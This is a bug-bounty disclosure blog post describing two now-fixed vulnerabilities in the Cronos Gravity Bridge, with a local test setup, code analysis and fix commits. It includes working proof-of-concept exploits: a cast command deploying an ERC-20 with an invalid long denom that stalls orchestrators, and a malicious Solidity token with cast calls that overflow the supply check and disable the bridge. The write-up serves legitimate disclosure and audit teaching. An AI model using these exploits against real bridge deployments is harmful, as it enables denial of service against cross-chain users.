Halting the Cronos Gravity Bridge

December 11, 2023

In January 2023, I found and reported two separate bugs to the Cronos Gravity Bridge project on Immunefi. The first bug would allow an attacker to halt all cross-chain transfers from Ethereum to Cronos (one-way). The second bug would allow an attacker to disable the bridge entirely.

This project has since been taken down from Immunefi. However, the Sommelier project now runs a bounty program for its own Gravity Bridge, which you can find here.

If you're after a high quality audit, please contact Zellic to set one up!

Setting up a local testing environment

The Cronos team was running the Gravity Bridge on their own testnet, and I obviously couldn't perform any testing on there and risk halting the chain. I remember having a lot of trouble setting up the local testing environment, because it was my first time dealing with a multi-chain system.

This section summarizes the steps I took to get the entire gravity bridge running locally for testing purposes. Hopefully this is useful to any readers planning to audit similar codebases.

Note: the steps below work against commit 155515ccdfc03a1376385113d2fc6919510d25ac. This is not the exact commit I originally tested against, but it will work.

To get a clean starting environment, I added the following integration test. It performs only the minimal setup (deploying contracts, setting up validators, etc.) and then leaves the environment running so that I can test however I want:

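// Save as `integration_tests/sandbox_test.go`
package integration_tests

import "time"

func (s *IntegrationTestSuite) TestSandbox() {
	s.Run("Bring up chain and see what happens", func() {
		s.T().Log("Chain established. Looping forever now...")

		// Sleep inside the loop so the test keeps the environment alive
		// without pinning a CPU core.
		for {
			time.Sleep(time.Second)
		}
	})
}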

I also modified the Makefile and added the following:

e2e_sandbox: e2e_clean_slate
	integration_tests/integration_tests.test -test.failfast -test.v -test.run IntegrationTestSuite -testify.m TestSandbox || make -s fail

I could now bring the gravity bridge online with the following command:

$ ARCHIVE_NODE_URL=your_mainnet_node_url make e2e_sandbox

High level overview of the Gravity Bridge

The Gravity Bridge consists of three main components:

  1. The smart contracts
  2. The x/gravity Cosmos module
  3. The orchestrators

Since this is a bridge, users are able to transfer tokens from Ethereum to Cronos, or vice versa. In either case, the functionality works as follows:

  • Ethereum to Cronos:

    1. User calls sendToCronos() on the Gravity.sol smart contract on Ethereum. This function emits a SendToCosmosEvent event.
    2. The orchestrators watch for these events. Once seen, they execute the MsgSubmitEthereumEvent message handler on the x/gravity Cosmos module to submit this event for processing.
    3. In the Cosmos module, this message causes a new event structure to either a) be created, or b) have a vote added to it. After each block is generated, the EndBlocker() function tallies up all votes from all validators for all events, and if enough votes are acquired, the event is processed.
  • Cronos to Ethereum:

    1. User executes the MsgSendToEthereum message in the Cosmos module. This deducts coins from the user's account and adds this cross-chain transfer to be processed. The BeginBlocker() function batches up multiple transfers into one unsigned transaction.
    2. The orchestrators periodically query for unsigned transaction batches using the UnsignedBatchTxsRequest query. They then sign and broadcast a transaction that calls the Gravity.sol contract's submitBatch() function.
    3. The submitBatch() function on the Gravity.sol contract distributes the tokens to the respective users.
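
The vote-tallying step in the Ethereum to Cronos flow can be pictured with a small Go model. This is only a sketch: the voteRecord type, the addVote and tally helpers, the validator names, and the two-thirds threshold are all assumptions made for illustration, not the module's actual types or parameters.

```go
package main

import "fmt"

// voteRecord is a hypothetical stand-in for the per-event structure the
// module keeps: the event nonce plus the set of validators that voted.
type voteRecord struct {
	nonce    uint64
	votes    map[string]bool // validator name -> has voted
	accepted bool
}

// addVote records a validator's vote. Voting twice does not count twice.
func (r *voteRecord) addVote(validator string) {
	r.votes[validator] = true
}

// tally marks the record as accepted once the voters hold more than 2/3 of
// the total power. The 2/3 threshold is an assumption for this sketch.
func tally(r *voteRecord, power map[string]uint64) bool {
	var total, voted uint64
	for v, p := range power {
		total += p
		if r.votes[v] {
			voted += p
		}
	}
	if voted*3 > total*2 {
		r.accepted = true
	}
	return r.accepted
}

func main() {
	power := map[string]uint64{"val0": 10, "val1": 10, "val2": 10, "val3": 10}
	rec := &voteRecord{nonce: 1, votes: map[string]bool{}}

	rec.addVote("val0")
	rec.addVote("val1")
	fmt.Println(tally(rec, power)) // false: only half of the power has voted

	rec.addVote("val2")
	fmt.Println(tally(rec, power)) // true: three quarters of the power has voted
}
```

In this model the event is only processed once tally() returns true, which matches the "create the record, then keep adding votes" behavior described in step 3.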

Note that the bridge has some other functionality (one piece of it is described below), but it all largely works in the same way.

Vulnerability 1 - Incorrect check for ERC-20 deploy events

Preliminary information

Within the Gravity.sol contract, there exists the deployERC20() function. Any user can use this function to deploy their own ERC-20 contract that can then be used for cross-chain token transfers through the gravity bridge.

This function deploys a new CosmosERC20 contract on behalf of the user, and then emits an ERC20DeployedEvent event that is handled later by the x/gravity Cosmos module (Code here):

function deployERC20(
    string calldata _cosmosDenom,
    string calldata _name,
    string calldata _symbol,
    uint8 _decimals
) external {
    // Deploy an ERC20 with entire supply granted to Gravity.sol
    CosmosERC20 erc20 = new CosmosERC20(address(this), _name, _symbol, _decimals);

    // Fire an event to let the Cosmos module know
    state_lastEventNonce = state_lastEventNonce + 1;
    emit ERC20DeployedEvent(
        _cosmosDenom,
        address(erc20),
        _name,
        _symbol,
        _decimals,
        state_lastEventNonce
    );
}

The _cosmosDenom argument is the denomination of the coin that is to be created on the Cronos side. A coin denomination is a unique identifier for a specific token in Cosmos-based chains.

One of the key fields within this emitted event is the nonce field, which is set to state_lastEventNonce in the above code. This nonce is unconditionally incremented any time an event is emitted by this contract.

The orchestrators watch for this event (and many others). For each event, they generate a MsgSubmitEthereumEvent message and execute it on the Cosmos module. If the message executes successfully, the Cosmos module increments its own lastEventNonce state variable.

Crucially, this Cosmos lastEventNonce is queried by the orchestrator in the ethereum_event_watcher::check_for_events() function. If the event nonce of the Ethereum event it is currently processing doesn't match the event nonce queried from the Cosmos module, it waits for another Cosmos block to be mined before checking again. In other words, the code assumes that the event nonces on both chains will always advance in lockstep (Code here):

let mut new_event_nonce = get_last_event_nonce(grpc_client, our_cosmos_address).await?;

while new_event_nonce != last_message_nonce {
    if error_count == 10 {
        return Err(GravityError::InvalidBridgeStateError(
            format!("Claims did not process, trying to update but still on event nonce {},\
                retrying from block {} to block {} in a moment"
                    , new_event_nonce , starting_block , ending_block),
        ));
    }
    info!("Waiting for claims to process, current on event nonce {}, trying to update to {}"
        , new_event_nonce, last_message_nonce);

    error_count += 1;
    contact.wait_for_next_block(timeout).await?;
    new_event_nonce = get_last_event_nonce(grpc_client, our_cosmos_address).await?;
}

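If we can cause a permanent mismatch between the nonces, this loop can never exit successfully. It gives up with an error after ten attempts, the orchestrator retries the same block range, and the cycle repeats, so the orchestrator is effectively stuck forever.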
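
To make the failure mode concrete, here is a minimal Go model of the nonce bookkeeping. It is a sketch under assumptions: the event and cosmosModule types and the submit and waitForNonce helpers are hypothetical names, and the real orchestrator is written in Rust and waits for a new Cosmos block between polls.

```go
package main

import "fmt"

// event is a simplified Ethereum event: its nonce, and whether the Cosmos
// module would accept it.
type event struct {
	nonce uint64
	valid bool
}

// cosmosModule models only the module's nonce bookkeeping.
type cosmosModule struct {
	lastEventNonce uint64
}

// submit advances lastEventNonce only when the event is accepted.
func (m *cosmosModule) submit(e event) error {
	if !e.valid {
		return fmt.Errorf("invalid event with nonce %d", e.nonce)
	}
	m.lastEventNonce = e.nonce
	return nil
}

// waitForNonce mirrors the orchestrator's wait loop: it polls until the
// module's nonce equals want, and gives up after maxTries polls.
func waitForNonce(m *cosmosModule, want uint64, maxTries int) error {
	for tries := 0; m.lastEventNonce != want; tries++ {
		if tries == maxTries {
			return fmt.Errorf("claims did not process, still on event nonce %d", m.lastEventNonce)
		}
		// The real loop waits for the next Cosmos block before polling again.
	}
	return nil
}

func main() {
	m := &cosmosModule{}

	good := event{nonce: 1, valid: true}
	_ = m.submit(good)
	fmt.Println(waitForNonce(m, good.nonce, 10)) // <nil>

	// The contract has already moved on to nonce 2, but the module refuses
	// the event, so its nonce stays at 1 no matter how long we wait.
	bad := event{nonce: 2, valid: false}
	_ = m.submit(bad)
	fmt.Println(waitForNonce(m, bad.nonce, 10)) // claims did not process, still on event nonce 1
}
```

Because the orchestrator resubmits the same events on every retry, a single event that the module always refuses is enough to keep the second call failing indefinitely.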

Since the Gravity.sol smart contract always either a) reverts, or b) unconditionally increments the nonce, the only other place to look for a bug is within the Cosmos module.

The vulnerability - causing a mismatch between nonces

The MsgSubmitEthereumEvent message handler's code starts off as follows:

func (k msgServer) SubmitEthereumEvent(c context.Context, msg *types.MsgSubmitEthereumEvent) (*types.MsgSubmitEthereumEventResponse, error) {
	ctx := sdk.UnwrapSDKContext(c)

	event, err := types.UnpackEvent(msg.Event)
	if err != nil {
		return nil, err
	}

	// [ ... ]

	return &types.MsgSubmitEthereumEventResponse{}, nil
}

When UnpackEvent(msg.Event) is called, it will take the inner event (in this case, the ERC20DeployedEvent event), and attempt to validate it. If validation fails, this code returns an error and never increases the Cosmos module's lastEventNonce. Code here:

func UnpackEvent(any *types.Any) (EthereumEvent, error) {
	// [ ... ]

	if err := event.Validate(); err != nil {
		return nil, sdkerrors.Wrapf(sdkerrors.ErrUnpackAny, "invalid EthereumEvent %+v", event)
	}

	return event, nil
}

Now, can we cause the validation to fail? Let's take a look at the code:

func (e20de *ERC20DeployedEvent) Validate() error {
	// [ ... ]
	if err := sdk.ValidateDenom(e20de.CosmosDenom); err != nil {
		return err
	}
	return nil
}

This code validates the event's CosmosDenom field, which we control. The Cosmos SDK source documents the rule for valid denominations, and it is easy to violate, for example with a denom longer than 128 characters:

var (
	// Denominations can be 3 ~ 128 characters long and support letters, followed by either
	// a letter, a number or a separator ('/').
)

Proof of concept exploit

To showcase an exploit, I used Foundry's cast to deploy an ERC-20 with the CosmosDenom set to a string longer than 128 characters.

The private key for one of the validators as well as the address of the deployed Gravity.sol contract can be fetched from one of the other tests, or from the terminal output when starting up the local environment:

$ cast send --private-key $PRIV_KEY --rpc-url http://localhost:8545 $GRAVITY_ADDR "deployERC20(string,string,string,uint8)" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAA" 0

Once you do this, the logs of every orchestrator container will fill up with the following errors:

2023-01-03T16:37:39.593002Z ERROR cosmos_gravity::send: Error during gRPC call to Cosmos containing 2 messages of types {"/gravity.v1.MsgSubmitEthereumEvent"}: CosmosGrpcError(RequestError { error: Status { code: Unknown, message: "invalid EthereumEvent event_nonce:5 cosmos_denom:\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" token_contract:\"0x39c3a55f68bf9f2992776991f25aac6813a4f1d0\" erc20_name:\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" erc20_symbol:\"AAA\" ethereum_height:13405669 : failed unpacking protobuf message from Any [PeggyJV/gravity-bridge/module/x/gravity/types/codec.go:116] With gas wanted: '0' and gas used: '6666' ", metadata: MetadataMap { headers: {"content-type": "application/grpc", "x-cosmos-block-height": "284"} } } })

2023-01-03T16:37:39.541526Z ERROR orchestrator::main_loop: Failed to get events for block range, Check your Eth node and Cosmos gRPC InvalidBridgeStateError("Claims did not process, trying to update but still on event nonce 4,retrying from block 13405664 to block 13405762 in a moment")

After this, no new events emitted by the Gravity.sol contract can ever be processed by the orchestrators, as they will all be stuck in an infinite loop.

The fix

The Cronos team determined that this was a Medium severity issue, as it temporarily halted Ethereum -> Cronos cross-chain communication. All other bridge functionality continued to work as intended.

The issue was fixed by moving the ValidateDenom check to the verifyERC20DeployedEvent() function. This function runs later on when events are processed, and if validation fails then, the bridge continues functioning as intended. Here is the fix commit.

Vulnerability 2 - Malicious token causes bridge to be deactivated

Preliminary information

As I mentioned before, events are handled through the EndBlocker() function. Specifically, the chain of calls is as follows:

EndBlocker -> eventVoteRecordPruneAndTally -> TryEventVoteRecord -> processEthereumEvent -> Handle

When auditing the code, I noticed that the processEthereumEvent() function had the following code:

func (k Keeper) processEthereumEvent(ctx sdk.Context, event types.EthereumEvent) {
	// then execute in a new Tx so that we can store state on failure
	xCtx, commit := ctx.CacheContext()
	if err := k.Handle(xCtx, event); err != nil { // execute with a transient storage
		k.DisableBridge(ctx)
		// [ ... ]
	}
}

So, when handling an event, if k.Handle() ever returns an error, the entire bridge is disabled.

Therefore, I set my sights on figuring out how to cause k.Handle() to return an error.

The vulnerability - Malicious token supply causes an error to be returned

The Handle() function processes many different kinds of events. The one of interest here is SendToCosmosEvent, which is handled as follows:

func (k Keeper) Handle(ctx sdk.Context, eve types.EthereumEvent) (err error) {
	switch event := eve.(type) {
	case *types.SendToCosmosEvent:
		// Check if coin is Cosmos-originated asset and get denom
		isCosmosOriginated, denom := k.ERC20ToDenomLookup(ctx, common.HexToAddress(event.TokenContract))
		addr, _ := sdk.AccAddressFromBech32(event.CosmosReceiver)
		coins := sdk.Coins{sdk.NewCoin(denom, event.Amount)}

		if !isCosmosOriginated {
			if err := k.DetectMaliciousSupply(ctx, denom, event.Amount); err != nil {
				return err
			}
			// [ ... ]
		}
		// [ ... ]
	}
	// [ ... ]
}

The code first determines if the token being sent originates from Cosmos itself. If it doesn't, it checks to see if a malicious supply is detected. If so, it returns an error.

The malicious supply check is as follows:

func (k Keeper) DetectMaliciousSupply(ctx sdk.Context, denom string, amount sdk.Int) (err error) {
	currentSupply := k.bankKeeper.GetSupply(ctx, denom)
	newSupply := new(big.Int).Add(currentSupply.Amount.BigInt(), amount.BigInt())
	if newSupply.BitLen() > 256 {
		return sdkerrors.Wrapf(types.ErrSupplyOverflow, "malicious supply of %s detected", denom)
	}

	return nil
}

Here, the amount is the amount field from the emitted SendToCosmosEvent event. If we can get the newSupply to ever be larger than a 256-bit integer, the code will error out and subsequently disable the bridge.

It is crucial to also note that this is only possible because the sendToCronos() function within the Gravity.sol contract never checks to see if the token being sent is whitelisted in any way. This allows an attacker to deploy their own malicious token, and then send tokens in such a way to cause DetectMaliciousSupply() to fail and return with an error.

Proof of concept exploit

To showcase an exploit, I deployed the following contract in the local testing environment:

pragma solidity 0.8.0;

contract MaliciousGravityToken {
    uint256 amount = 0;

    function balanceOf(address) external view returns (uint256 balance) {
        balance = amount;
    }

    function transferFrom(address, address, uint256 _amount) external {
        if (amount == 0) {
            amount = _amount;
        } else {
            amount = 0;
        }
    }
}

$ forge create --private-key $PRIV_KEY --rpc-url http://localhost:8545 src/MaliciousGravityToken.sol:MaliciousGravityToken

Deployed to: 0xe4559da99d5b420E440E06fDd19de35f930BbdbF

What this contract does is simple: it reports a balance of 0 initially, and once transferFrom() has been called, it reports whatever amount was passed in as its balance. No tokens ever need to exist, yet the second balance the bridge reads equals the amount we asked to transfer.

When sendToCronos() is called with the amount set to 2**256 - 1, it causes the code to emit an event that sets the amount to 115792.....639935:

$ cast send --private-key $PRIV_KEY --rpc-url http://localhost:8545 $GRAVITY_ADDR "sendToCronos(address,address,uint256)" $TOKEN_ADDR $VAL_ADDR 115792089237316195423570985008687907853269984665640564039457584007913129639935

We can check the gravity0 container logs to verify the new token supply:

9:02AM INF minted coins from module account amount=115792089237316195423570985008687907853269984665640564039457584007913129639935gravity0xe4559da99d5b420E440E06fDd19de35f930BbdbF from=gravity module=x/bank

After this, we just need to perform one more transfer to cause the supply to go above 2**256.

First, I performed a zero-amount transfer directly on the token. Because the amount storage variable is non-zero at this point, this call resets it to 0. Then, I called sendToCronos() again in the same way:

$ cast send --private-key $PRIV_KEY --rpc-url http://localhost:8545 $TOKEN_ADDR "transferFrom(address,address,uint256)" $VAL_ADDR $VAL_ADDR 0

$ cast send --private-key $PRIV_KEY --rpc-url http://localhost:8545 $GRAVITY_ADDR "sendToCronos(address,address,uint256)" $TOKEN_ADDR $VAL_ADDR 115792089237316195423570985008687907853269984665640564039457584007913129639935

After this, the logs of the gravity0 container show that the bridge is disabled:

9:04AM INF BridgeActivate is set to false module=x/gravity
9:04AM ERR ethereum event vote record failed cause="malicious supply of gravity0xe4559da99d5b420E440E06fDd19de35f930BbdbF detected: malicious ERC20 with invalid supply sent over bridge" event type=*types.SendToCosmosEvent id="\x05\x00\x00\x00\x00\x00\x00\x00\x04�P\x14#rgK�typ�\x10�\u058bI�CH\t��Y�S����S�" module=x/gravity nonce=4
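
The sequence of calls in this proof of concept can be replayed against a small Go model of the token. The maliciousToken type is a direct transliteration of the Solidity contract (with uint64 standing in for uint256). The observedDeposit helper is an assumption: it models the bridge as reading balanceOf() before and after transferFrom() and treating the difference as the deposit, which is how the two-balance behavior described above would come about.

```go
package main

import "fmt"

// maliciousToken mirrors the storage of MaliciousGravityToken.
// uint64 stands in for uint256 to keep the sketch small.
type maliciousToken struct {
	amount uint64
}

func (t *maliciousToken) balanceOf() uint64 { return t.amount }

// transferFrom stores the amount when the slot is empty, otherwise clears it.
func (t *maliciousToken) transferFrom(amount uint64) {
	if t.amount == 0 {
		t.amount = amount
	} else {
		t.amount = 0
	}
}

// observedDeposit is the ASSUMED bridge behavior: compare the balance before
// and after transferFrom and report the increase (0 if there is none).
func observedDeposit(t *maliciousToken, amount uint64) uint64 {
	before := t.balanceOf()
	t.transferFrom(amount)
	after := t.balanceOf()
	if after <= before {
		return 0
	}
	return after - before
}

func main() {
	const huge = 1000 // stands in for 2**256 - 1
	tok := &maliciousToken{}

	fmt.Println(observedDeposit(tok, huge)) // 1000: first deposit is observed in full

	tok.transferFrom(0) // the zero-amount transfer resets the slot to 0

	fmt.Println(observedDeposit(tok, huge)) // 1000: second deposit is observed in full

	// Without the reset, the next call clears the slot and nothing is observed.
	fmt.Println(observedDeposit(tok, huge)) // 0
}
```

The last line shows why the zero-amount transfer is needed between the two sendToCronos() calls: without it, the second call would toggle the stored amount back to 0 and no deposit would be seen.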

The fix

The Cronos team determined this to be a Medium severity vulnerability as well. They explained that although they had overlooked the possibility of an attacker deliberately disabling the bridge whenever they wanted, the bridge being disabled is itself the correct behavior here.

The issue was fixed by returning nil instead of an error when a malicious supply is detected. Here is the fix commit.
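
The effect of that change can be sketched with a toy Go model. Everything here is hypothetical and simplified: the keeper type, the process method, and the handleBefore and handleAfter functions are illustrative names, and the assumption that the fixed handler skips the mint is mine rather than something taken from the fix commit.

```go
package main

import (
	"errors"
	"fmt"
)

var errSupplyOverflow = errors.New("malicious supply detected")

// keeper models only the bridge's on/off switch.
type keeper struct {
	bridgeActive bool
}

// process mirrors processEthereumEvent: any handler error disables the bridge.
func (k *keeper) process(handle func() (minted bool, err error)) bool {
	minted, err := handle()
	if err != nil {
		k.bridgeActive = false
	}
	return minted
}

// handleBefore models the original behavior: the overflow error propagates.
func handleBefore(overflow bool) (bool, error) {
	if overflow {
		return false, errSupplyOverflow
	}
	return true, nil
}

// handleAfter models the fix: the deposit is dropped (assumed), but nil is
// returned, so the caller has no reason to disable the bridge.
func handleAfter(overflow bool) (bool, error) {
	if overflow {
		return false, nil
	}
	return true, nil
}

func main() {
	before := &keeper{bridgeActive: true}
	before.process(func() (bool, error) { return handleBefore(true) })
	fmt.Println(before.bridgeActive) // false: attacker disabled the bridge

	after := &keeper{bridgeActive: true}
	minted := after.process(func() (bool, error) { return handleAfter(true) })
	fmt.Println(after.bridgeActive, minted) // true false: bridge stays up, nothing minted
}
```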

Conclusion

This was my first foray into hunting for bugs in a bridge, and I faced a lot of difficulties with getting the testing environment set up. I hope this blog post helps readers start hunting for bugs in similar cross-chain systems. In my experience, these types of vulnerabilities are generally more unusual than smart contract vulnerabilities, which makes them all the more fun to discover.

As always, if you're after a high quality audit, please contact Zellic to set one up!


Hello! I am Faraz, a Web3 auditor at Zellic. I used to be a Chrome + Android vulnerability researcher in a previous life. Follow me on twitter!

You can find my old vulnerability research blog here.